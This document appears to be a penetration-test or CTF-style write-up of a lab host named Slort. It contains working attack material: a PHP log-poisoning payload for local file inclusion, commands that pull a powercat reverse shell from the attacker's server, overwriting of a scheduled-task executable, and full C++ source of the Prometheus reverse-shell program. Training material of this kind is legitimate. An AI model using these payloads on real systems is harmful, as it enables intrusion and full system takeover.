Slort

Penetration Test Report

Introduction

The penetration test report contains all efforts that were conducted during client engagement. The purpose of this report is to ensure that the client has a full understanding of penetration testing methodologies as well as the technical knowledge to remediate any security flaws.

Objective

The objective of this assessment is to perform an internal penetration test against the network. The student is tasked with following methodical approach in obtaining full control of the network. This test should simulate an attacker and how an attacker would start from beginning to end.

Requirements

The pentester will be required to fill out this penetration testing report fully and to include the following sections:

Overall High-Level Summary and Recommendations (non-technical)
Methodology walkthrough and detailed outline of steps taken
Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable
Any additional items that were not included

High-Level Summary

I was tasked with performing an internal penetration test towards the client network. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate internal systems. My overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to the client.

When performing the internal penetration test, there were several alarming vulnerabilities that were identified on client's network. When performing the attacks, I was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the testing, I had administrative level access to multiple systems. All systems were successfully exploited and access granted. These systems as well as a brief description on how access was obtained are listed below:

192.168.192.53 (slort) - Local File Inclusion & Remote Code Execution

Recommendations

I recommend patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.

Methodologies

I utilized a widely adopted approach to performing penetration testing that is effective in testing how well the environments is secured. Below is a breakout of how I was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.

Information Gathering

The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, I was tasked with exploiting the client network. The specific IP addresses were:

Network

192.168.192.0/24

Penetration

The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, I was able to successfully gain access to all systems.

System IP: 192.168.192.53

Service Enumeration

The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test. In some cases, some ports may not be listed.

Server IP Address

Ports Open

192.168.192.53

TCP: 21,135,139,445,3306,4443,5040,7680,8080,49664,49665,49666,49668,49667,49668,49669

UDP:

Nmap Scan Results

┌──[Fri Nov 11 05:00:33 PM CST 2022]-[TheScriptKid]-[/tmp]
├──[wlan0: 192.168.1.153]-[tun0: 192.168.49.192]-[ip: 192.168.192.53]
└──# rscan $ip               
rustscan --accessible -u 5000 -b 2500 -a 192.168.192.53 -- -Pn -A
...
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 FileZilla ftpd 0.9.41 beta
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 127
3306/tcp  open  mysql?        syn-ack ttl 127
| mysql-info: 
|_  MySQL Error: Host '192.168.49.192' is not allowed to connect to this MariaDB server
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, NULL, NotesRPC, SIPOptions, SSLSessionReq, afp: 
|_    Host '192.168.49.192' is not allowed to connect to this MariaDB server
4443/tcp  open  http          syn-ack ttl 127 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.192.53:4443/dashboard/
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
5040/tcp  open  unknown       syn-ack ttl 127
7680/tcp  open  pando-pub?    syn-ack ttl 127
8080/tcp  open  http          syn-ack ttl 127 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.192.53:8080/dashboard/
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.92%I=7%D=11/11%Time=636ED424%P=x86_64-pc-linux-gnu%r(N
SF:ULL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.49\.192'\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSVersi
SF:onBindReqTCP,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.49\.192'\x20is\x2
SF:0not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r
SF:(DNSStatusRequestTCP,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.49\.192'\
SF:x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20se
SF:rver")%r(SSLSessionReq,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.49\.192
SF:'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20
SF:server")%r(SIPOptions,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.49\.192'
SF:\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20s
SF:erver")%r(NotesRPC,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.49\.192'\x2
SF:0is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20serv
SF:er")%r(afp,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.49\.192'\x20is\x20n
SF:ot\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows 7 (91%), Microsoft Windows Server 2008 SP1 or Windows Server 2008 R2 (90%), Microsoft Windows XP SP3 (88%), Microsoft Windows Server 2008 SP1 (88%), Microsoft Windows 10 (87%), Microsoft Windows 7 or Windows Server 2008 R2 (87%), Microsoft Windows Server 2008 R2 (87%), Microsoft Windows Server 2008 R2 or Windows 8.1 (87%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (87%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (87%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.92%E=4%D=11/11%OT=21%CT=%CU=31965%PV=Y%DS=2%DC=T%G=N%TM=636ED4D7%P=x86_64-pc-linux-gnu)
SEQ(SP=104%GCD=1%ISR=10C%TI=I%II=I%SS=S%TS=U)
OPS(O1=M551NW8NNS%O2=M551NW8NNS%O3=M551NW8%O4=M551NW8NNS%O5=M551NW8NNS%O6=M551NNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%T=80%W=FFFF%O=M551NW8NNS%CC=N%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 53006/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 4440/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 16946/udp): CLEAN (Failed to receive data)
|   Check 4 (port 27555/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2022-11-11T23:03:39
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   60.54 ms 192.168.49.1
2   60.63 ms 192.168.192.53

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:03
Completed NSE at 17:03, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:03
Completed NSE at 17:03, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:03
Completed NSE at 17:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 180.39 seconds
           Raw packets sent: 87 (5.736KB) | Rcvd: 42 (3.060KB)

Initial Shell - Local File Inclusion & Remote Code Execution

I Start to view the two web ports beginning with port 8080 and see a XAMPP system

Nothing of interest however I begin to search for directories and find a web directory called site

┌──[Fri Nov 11 08:59:42 PM CST 2022]-[TheScriptKid]-[/home/pentester]
├──[wlan0: 192.168.1.153]-[tun0: 192.168.49.192]-[ip: 192.168.192.53]
└──# ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -u http://$ip:8080/FUZZ/ -fc 404        

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.192.53:8080/FUZZ/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response status: 404
________________________________________________

cgi-bin                 [Status: 403, Size: 1060, Words: 103, Lines: 43, Duration: 204ms]
img                     [Status: 200, Size: 1219, Words: 84, Lines: 18, Duration: 120ms]
error                   [Status: 403, Size: 1060, Words: 103, Lines: 43, Duration: 828ms]
site                    [Status: 301, Size: 27, Words: 4, Lines: 1, Duration: 67ms]

Going to the site directory redirects me to a page. Slort.

Viewing the URL's when viewing the source code shows Home, About, Services and so on appears to be utilizing a php parameter and including the pages.

With this information I begin to be on the lookout for a local file inclusion vulnerability and find that this is vulnerable to a Local File inclusion as I am able to view the access and error logs

┌──[Fri Nov 11 09:07:46 PM CST 2022]-[TheScriptKid]-[/home/pentester]
├──[wlan0: 192.168.1.153]-[tun0: 192.168.49.192]-[ip: 192.168.192.53]
└──# ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt -u http://$ip:8080/site/index.php?page=FUZZ -fl 5,3

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.192.53:8080/site/index.php?page=FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response lines: 5,3
________________________________________________

../../apache/logs/access.log [Status: 200, Size: 12459056, Words: 1564887, Lines: 87048, Duration: 115ms]
../../apache/logs/error.log [Status: 200, Size: 5890655, Words: 550589, Lines: 21322, Duration: 81ms]

I will attempt to gain remote code execution by sending a web request containing PHP code.

┌──[Fri Nov 11 09:17:23 PM CST 2022]-[TheScriptKid]-[/home/pentester]
├──[wlan0: 192.168.1.153]-[tun0: 192.168.49.192]-[ip: 192.168.192.53]
└──# curl http://$ip:8080/ -A "<?php system(\$_GET['cmd']);?>"

Sending another web request using the browser only this time I include a windows system command to gain a reverse shell

┌──[Fri Nov 11 06:24:27 PM CST 2022]-[TheScriptKid]-[/tmp]
├──[wlan0: 192.168.1.153]-[tun0: 192.168.49.192]-[ip: 192.168.192.53]
└──# python3 -m http.server 80 -d /opt/winreconpack                                                   
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.192.53 - - [11/Nov/2022 21:26:11] "GET /powercat.ps1 HTTP/1.1" 200 -

┌──[Fri Nov 11 09:19:45 PM CST 2022]-[TheScriptKid]-[/home/pentester]
├──[wlan0: 192.168.1.153]-[tun0: 192.168.49.192]-[ip: 192.168.192.53]
└──# nc -lnvp 443                                                                        
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 192.168.192.53.
Ncat: Connection from 192.168.192.53:51073.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\xampp\htdocs\site>

Vulnerability Explanation

Vulnerability Fix

Severity: Critical

Proof of Concept

Local.txt Proof Screenshot

Local.txt Contents

PS C:\users\rupert\desktop> hostname; whoami; type local.txt; ipconfig /all
hostname; whoami; type local.txt; ipconfig /all
slort
slort\rupert
1bf81193978891c7b72fc8b9d4bd0a90

Windows IP Configuration

   Host Name . . . . . . . . . . . . : slort
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
   Physical Address. . . . . . . . . : 00-50-56-BF-A8-39
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 192.168.192.53(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.192.254
   DNS Servers . . . . . . . . . . . : 192.168.192.254
   NetBIOS over Tcpip. . . . . . . . : Enabled
PS C:\users\rupert\desktop>

Privilege Escalation

I begin to start searching files and system directories and came across the Backups directory in the top level of the C drive. Furthermore, inside the backups directory it appears there is a scheduled task running every 5 minutes.

PS C:\> ls
ls


    Directory: C:\


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----        11/11/2022   5:30 PM                Backup                                                               
d-----         12/7/2019   1:14 AM                PerfLogs                                                             
d-r---          5/4/2022   1:06 AM                Program Files                                                        
d-r---         12/3/2021   8:22 AM                Program Files (x86)                                                  
d-r---         12/3/2021   8:29 AM                Users                                                                
d-----          5/4/2022   1:52 AM                Windows                                                              
d-----         6/12/2020   8:11 AM                xampp                                                                


PS C:\> cd backup
cd backup
PS C:\backup> ls
ls


    Directory: C:\backup


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         6/12/2020   7:45 AM          11304 backup.txt                                                           
-a----         6/12/2020   7:45 AM             73 info.txt                                                             
-a----         6/23/2020   7:49 PM          73802 TFTP.EXE                                                             


PS C:\backup> cat info.txt
cat info.txt
Run every 5 minutes:
C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txt

Looking into the permissions of the TFTP.EXE executable, this file can be modified by any user

PS C:\backup> icacls C:\Backup\TFTP.EXE
icacls C:\Backup\TFTP.EXE
C:\Backup\TFTP.EXE BUILTIN\Users:(I)(F)
                   BUILTIN\Administrators:(I)(F)
                   NT AUTHORITY\SYSTEM:(I)(F)
                   NT AUTHORITY\Authenticated Users:(I)(M)

I proceed into creating a malicious file using prometheus containing a reverse shell.

┌──[Fri Nov 11 10:41:14 PM CST 2022]-[TheScriptKid]-[/tmp]
├──[wlan0: 192.168.1.153]-[tun0: 192.168.49.192]-[ip: 192.168.192.53]
└──# i686-w64-mingw32-g++ /opt/prometheus/prometheus.cpp -o /opt/winreconpack/TFTP.EXE -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

I copy the file from my attacking machine smb server

PS C:\backup> net use \\192.168.49.192\winreconpack /user:smbuser smbuser
net use \\192.168.49.192\winreconpack /user:smbuser smbuser
The command completed successfully.

PS C:\backup> copy \\192.168.49.192\winreconpack\TFTP.EXE TFTP.EXE.mal
copy \\192.168.49.192\winreconpack\TFTP.EXE

Next I overwrite the TFTP.EXE with the malicious file and wait at most 5 minutes.

PS C:\backup> copy TFTP.EXE.mal TFTP.EXE
copy TFTP.EXE.mal TFTP.EXE

After a few minutes the task executes and I gain administrative access

┌──[Fri Nov 11 10:42:53 PM CST 2022]-[TheScriptKid]-[/root]
├──[wlan0: 192.168.1.153]-[tun0: 192.168.49.192]-[ip: 192.168.192.53]
└──# nc -lnvp 443                                                                                                                                        130 ⨯
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 192.168.192.53.
Ncat: Connection from 192.168.192.53:51486.

Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>

Vulnerability Exploited: Insecure Executable Permissions

Vulnerability Explanation: An attacker can modify an executable with their own malicious code as an unprivileged user and can be run

Vulnerability Fix: Remove unnecessary permissions on files such as executables

Severity: Critical

Proof Screenshot Here

Proof.txt Contents

C:\Users\Administrator\Desktop>hostname && whoami && type proof.txt && ipconfig /all
hostname && whoami && type proof.txt && ipconfig /all
slort
slort\administrator
30a9b632f36e9aa08c07f1554e7b2b62

Windows IP Configuration

   Host Name . . . . . . . . . . . . : slort
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
   Physical Address. . . . . . . . . : 00-50-56-BF-A8-39
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 192.168.192.53(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.192.254
   DNS Servers . . . . . . . . . . . : 192.168.192.254
   NetBIOS over Tcpip. . . . . . . . : Enabled

C:\Users\Administrator\Desktop>

Maintaining Access

Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.

House Cleaning

The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road. Ensuring that we are meticulous and no remnants of our penetration test are left over is important.

After collecting data from the network was completed, I removed all user accounts and passwords as well as the Meterpreter services installed on the system. the client should not have to remove any user accounts or services from the system.

Additional Items

Appendix - Proof and Local Contents:

IP (Hostname)

Local.txt Contents

Proof.txt Contents

192.168.192.53

1bf81193978891c7b72fc8b9d4bd0a90

30a9b632f36e9aa08c07f1554e7b2b62

Appendix - Modified Prometheus Code

Modified Lines 82 & 83

//Author : Paranoid Ninja
//Email  : paranoidninja@protonmail.com
//Blog   : https://scriptdotsh.com/index.php/2018/09/04/malware-on-steroids-part-1-simple-cmd-reverse-shell/

//Compile with g++/i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
//The effective size with statically compiled code should be around 13 Kb


#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#pragma comment(lib, "Ws2_32.lib")
#define DEFAULT_BUFLEN 1024


void RunShell(char* C2Server, int C2Port) {
    while(true) {
        Sleep(5000);    // 1000 = One Second

        SOCKET mySocket;
        sockaddr_in addr;
        WSADATA version;
        WSAStartup(MAKEWORD(2,2), &version);
        mySocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
        addr.sin_family = AF_INET;
   
        addr.sin_addr.s_addr = inet_addr(C2Server);  //IP received from main function
        addr.sin_port = htons(C2Port);     //Port received from main function

        //Connecting to Proxy/ProxyIP/C2Host
        if (WSAConnect(mySocket, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL)==SOCKET_ERROR) {
            closesocket(mySocket);
            WSACleanup();
            continue;
        }
        else {
            char RecvData[DEFAULT_BUFLEN];
            memset(RecvData, 0, sizeof(RecvData));
            int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
            if (RecvCode <= 0) {
                closesocket(mySocket);
                WSACleanup();
                continue;
            }
            else {
                char Process[] = "cmd.exe";
                STARTUPINFO sinfo;
                PROCESS_INFORMATION pinfo;
                memset(&sinfo, 0, sizeof(sinfo));
                sinfo.cb = sizeof(sinfo);
                sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
                sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE) mySocket;
                CreateProcess(NULL, Process, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
                WaitForSingleObject(pinfo.hProcess, INFINITE);
                CloseHandle(pinfo.hProcess);
                CloseHandle(pinfo.hThread);

                memset(RecvData, 0, sizeof(RecvData));
                int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
                if (RecvCode <= 0) {
                    closesocket(mySocket);
                    WSACleanup();
                    continue;
                }
                if (strcmp(RecvData, "exit\n") == 0) {
                    exit(0);
                }
            }
        }
    }
}
//-----------------------------------------------------------
//-----------------------------------------------------------
//-----------------------------------------------------------
int main(int argc, char **argv) {
    FreeConsole();
    if (argc == 3) {
        int port  = atoi(argv[2]); //Converting port in Char datatype to Integer format
        RunShell(argv[1], port);
    }
    else {
        char host[] = "192.168.49.192";
        int port = 443;
        RunShell(host, port);
    }
    return 0;
}

NextBillyBoss

Last updated 3 years ago